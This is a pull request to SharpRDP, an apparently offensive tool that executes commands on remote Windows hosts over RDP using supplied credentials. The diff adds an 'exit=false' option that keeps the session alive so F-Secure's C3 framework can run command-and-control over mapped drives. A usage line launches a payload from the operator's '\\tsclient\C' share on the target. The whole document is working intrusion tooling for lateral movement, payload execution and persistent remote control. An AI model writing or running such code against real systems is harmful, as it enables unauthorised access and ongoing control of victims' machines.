### PR TITLE
Added the exit=false flag to keep session alive after command execution

### DIFF
--- a/SharpRDP/SharpRDP/Client.cs
+++ b/SharpRDP/SharpRDP/Client.cs
@@ -22,6 +22,7 @@ namespace SharpRDP
         private string target;
         private string runtype;
         private bool isdrive;
+        private bool exitend;
         private bool takeover;
         private bool networkauth;
         private enum LogonErrors : uint
@@ -92,12 +93,13 @@ namespace SharpRDP
             SSL_ERR_SMARTCARD_WRONG_PIN = 0x1C07
         }
 
-        public void CreateRdpConnection(string server, string user, string domain, string password, string command, string execw, string runelevated, bool condrive, bool tover, bool nla)
+        public void CreateRdpConnection(string server, string user, string domain, string password, string command, string execw, string runelevated, bool condrive, bool xitend, bool tover, bool nla)
         {
             keycode = new Dictionary<String, Code>();
             KeyCodes();
             runtype = runelevated;
             isdrive = condrive;
+            exitend = xitend;
             cmd = command;
             target = server;
             execwith = execw;
@@ -127,10 +129,7 @@ namespace SharpRDP
                     rdpConnection.UserName = user;
                     rdpConnection.AdvancedSettings9.allowBackgroundInput = 1;
                     rdpConnection.AdvancedSettings9.BitmapPersistence = 0;
-                    if(condrive == true)
-                    {
-                        rdpConnection.AdvancedSettings5.RedirectDrives = true;
-                    }
+                    rdpConnection.AdvancedSettings5.RedirectDrives = true;
                     if (password != string.Empty || user != string.Empty)
                     {
                         rdpConnection.UserName = user;
@@ -238,11 +237,24 @@ namespace SharpRDP
             {
                 RunRun();
             }
-
             Thread.Sleep(1000);
-            Console.WriteLine("[+] Disconnecting from    :  {0}", target);
-            rdpSession.Disconnect();
+
+            if (exitend)
+            {
+                Console.WriteLine("[+] Disconnecting from    :  {0}", target);
+                rdpSession.Disconnect();
+            }
+            else
+            {
+                Console.WriteLine("[+] Keeping session alive for C2 over mapped drives    :  {0}", target);
+                Console.WriteLine("[+] Ctrl+c or kill process to end", target);
+
+                // ignore all input and keep the session alive
+                Console.ReadKey();
+            }
         }
+
+
 
         private void RdpConnectionOnOnDisconnected(object sender, IMsTscAxEvents_OnDisconnectedEvent e)
         {

--- a/SharpRDP/SharpRDP/Client.cs
+++ b/SharpRDP/SharpRDP/Client.cs
@@ -129,7 +129,10 @@ namespace SharpRDP
                     rdpConnection.UserName = user;
                     rdpConnection.AdvancedSettings9.allowBackgroundInput = 1;
                     rdpConnection.AdvancedSettings9.BitmapPersistence = 0;
-                    rdpConnection.AdvancedSettings5.RedirectDrives = true;
+                    if (condrive == true)
+                    {
+                        rdpConnection.AdvancedSettings5.RedirectDrives = true;
+                    }
                     if (password != string.Empty || user != string.Empty)
                     {
                         rdpConnection.UserName = user;

--- a/SharpRDP/SharpRDP/Program.cs
+++ b/SharpRDP/SharpRDP/Program.cs
@@ -28,6 +28,8 @@ namespace SharpRDP
             Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user password=password elevated=winr");
             Console.WriteLine("  Execute command elevated through task manager");
             Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user password=password elevated=taskmgr");
+            Console.WriteLine("  Execute payload through shared drive and keep connection active for C2");
+            Console.WriteLine("    SharpRDP.exe computername=domain.target command=\"\\\\tsclient\\C\\payload.exe\" username=domain\\user password=password connectdrive=true exit=false");
         }
         static void Main(string[] args)
         {
@@ -60,6 +62,7 @@ namespace SharpRDP
             string execElevated = string.Empty;
             string execw = "";
             bool connectdrive = false;
+            bool exitend = true;
             bool takeover = false;
             bool nla = false;
             
@@ -129,6 +132,13 @@ namespace SharpRDP
                         connectdrive = true;
                     }
                 }
+                if (arguments.ContainsKey("exit"))
+                {
+                    if (arguments["exit"].ToLower() == "false")
+                    {
+                        exitend = false;
+                    }
+                }
                 if (arguments.ContainsKey("takeover"))
                 {
                     if (arguments["takeover"].ToLower() == "true")
@@ -146,7 +156,7 @@ namespace SharpRDP
                 string[] computerNames = arguments["computername"].Split(',');
                 foreach (string server in computerNames)
                 {
-                    rdpconn.CreateRdpConnection(server, username, domain, password, command, execw, execElevated, connectdrive, takeover, nla);
+                    rdpconn.CreateRdpConnection(server, username, domain, password, command, execw, execElevated, connectdrive, exitend, takeover, nla);
                 }
             }
             else


### PR DESCRIPTION
Added the exit=false flag to keep the session alive after the command finishes executing. This is so that F-Secure's C3 framework can be used to establish C2 over the mapped drives using the _UncShareFile_ module. 